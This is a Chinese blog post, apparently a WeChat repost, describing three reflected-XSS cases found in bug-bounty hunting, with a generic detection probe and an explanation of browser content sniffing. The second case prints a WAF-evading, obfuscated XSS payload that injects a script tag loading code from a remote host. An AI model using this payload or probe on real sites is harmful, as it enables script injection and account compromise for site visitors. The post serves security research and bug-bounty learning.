[案例分享]我和反射Xss的奇闻趣事

admin

138690
文章

114
评论

2024年5月22日00:04:33评论11 views字数 2407阅读8分1秒阅读模式

今天来给大家掰扯掰扯那些没人要的漏洞

入行之初，我只会挖反射xss，因为这种类型的洞比较简单，且国内许多厂商都存在这种没人要的漏洞，但，赏金偏低。我挖到过赏金最高的反射xss才值600，还是*里SRC核心业务。

另：*易SRC边缘业务15块

不过，反射xss在海外，赏金可不低。我见过最离谱的，就是微软crlf导致反射xss，赏金6000$。

https://infosecwriteups.com/6000-with-microsoft-hall-of-fame-microsoft-firewall-bypass-crlf-to-xss-microsoft-bug-bounty-8f6615c47922

[案例分享]我和反射Xss的奇闻趣事

闲话少说，接下来，从我挖掘到的反射xss漏洞里，抽三个典型案例讲一讲。

或许技术含量不多，但，可能会给你提供一些新思路。在分析案例之前，先科普几个小🐥💩。

什么是反射xss?

我的理解是，参数的输入和输出未经安全过滤，导致浏览器直接解析恶意代码。

如何检测反射xss?

献上我的万能poc：

'"/><s>ssssssss

poc使用方法

依次在每一个参数中注入poc，发起请求，然后检查返回的源码是否能直接搜索到<s>ssssssss，如能搜索到，很大概率存在漏洞，误报率大约占40%，需要人工去确认最终结果。

举个🌰∶

https://www.b.com/a?p1=1&p2=2

注入poc后的链接为:

https://www.b.com/a?p1=1poc&p2=2https://www.b.com/a?p1=1&p2=2poc

这是模糊匹配挖掘方式。

如想精确匹配漏洞，可以判断返回的content-type是否为html。不过越是精确的匹配方案，越会错过许多奇葩的漏洞，个人推荐模糊匹配。

案例一∶真假难辨的content-type

所见一定是所得吗？不一定！

服务端在异步加载接口的时候，返回的content-type，与单独请求接口返回的content-type会存在差异，如下图:

当前返回的是text/plain，看起来似乎不存在漏洞，但是单独将这个请求拿出来，返回的却是：

弹个窗:

案例二∶不可思议的路由型反射xss

有时候，存在反射xss的地方也不一定需要参数，只要你大胆猜测，那么你在挖洞的时候，就能发现新思路。

比如以下案例，这是在下载app页面，url上没有任何参数：

然后，我就多手在URL后面加上了poc：

惊奇地看到poc生效了！

由于这个网站有waf，再加上属于路由处存在xss注入点，poc中不能存在斜杠，否则会解析为路由组成。为了构造出poc，我足足耗费了一周时间，每天下班就去绕，最后成功了，审核大哥也给我提升了漏洞等级。

给各位大哥献上poc(最后那几个小数点是也是组成部分，安全防护存在是小数点过滤):

http://example.com/mobile/down/example%22%3E%3Cimg%20src%3D1%20onerror%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3D%22s%3Ddocument.createElement%28%27script%27%29%3Bbody.appendChild%28s%29%3Bvar%20a%3D%27Lw%3D%3D%27%3Bs.src%3D%27http%3A%27%2bwindow.atob%28a%29%2bwindow.atob%28a%29%2b%27u3v.cn.example.com%27%2bwindow.atob%28a%29%2b%275hfHgf%27%3B%22%3E...................

案例三∶浏览器的神秘解析

这个案例源自于一个小师傅的提问，某天小师傅给我发消息，为什么他上传了html文件，只能在IE浏览器中可以执行弹窗代码，在别的浏览器却不可以。

当时我也不理解，于是乎查阅了许多文章，发现这是浏览器的内容嗅探机制(content sniffing)造成的。

浏览器内容嗅探机制，工作原理可以简单理解为，当服务器响应头中没有指定content-type时，浏览器会根据源码内容或者是请求的资源后缀，作为文件类型进行解析，其中IE浏览器的嗅探机制最为简单粗暴，流程如下:

1.根据响应头conten-type判断文件类型；
2.无法匹配到合适的content-type，按照请求路径中的后缀解析，比如:

http://127.0.0.1:8089/get-xss.html?name=1%3E%3Cs%3Esssssssss，即响应头content-type为text/test时，如下图所示:

根据这一原理，我挖到了某厂商的IE反射型XSS，属于主站接口(后面被忽略了，哈哈哈哈，危害过低)

浏览器内容嗅探是一个非常神奇的机制，大家可以深入研究一下，有兴趣的可以后台滴滴小窗口，我们一起进步！

以上就是我要分享的三个小案例，原理性的内容并不多，主要是想和大家分享下挖掘思路。漏洞千奇百怪，无所不有！

结语

由于工作原因，空闲的时间并不多，感觉一个人运维公众号挺消耗精力的，从写正文到排版、配图、做封面，每一步都是需要投入心思。原计划每周更新两篇文章，如今看来难度蛮大的，时间紧迫，再加上个人思路也会有分享完的那天。如果你也有好的漏洞🌰，欢迎滴滴后台或加我VX:Captain0XX 投稿，漏洞不分高低，本号的理念是分享知识，传递快乐。如果本篇文章点赞超过20，下一篇给大家分享下dom–xss的挖掘思路。

[案例分享]我和反射Xss的奇闻趣事

来都来了，点个赞？

原文始发于微信公众号（进击的HACK）：[案例分享]我和反射Xss的奇闻趣事

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

[案例分享]我和反射Xss的奇闻趣事

【漏洞与预防】畅捷通文件上传漏洞预防

实战攻防 | 1.6K主机全域沦陷实录：从单点突破到域控接管的终极横向渗透链

几千个产品的默认账号密码

网络安全人士必知的MCP和A2A协议

第三方供应商遭勒索软件攻击，中国银行和星展银行11,200名客户受影响

低成本本地部署DeepSeek

PG_Vmdak

如何搭建符号执行环境并跑通第一个测试样例

渗透测试|柳暗花明(记一次有趣的高危漏洞以及思考修复方案)

从通过 .js 文件中找到的 URL 访问受限功能，到通过修改 API上HTTP响应中的accessLevel值进行权限提升

发表评论

在线咨询

微信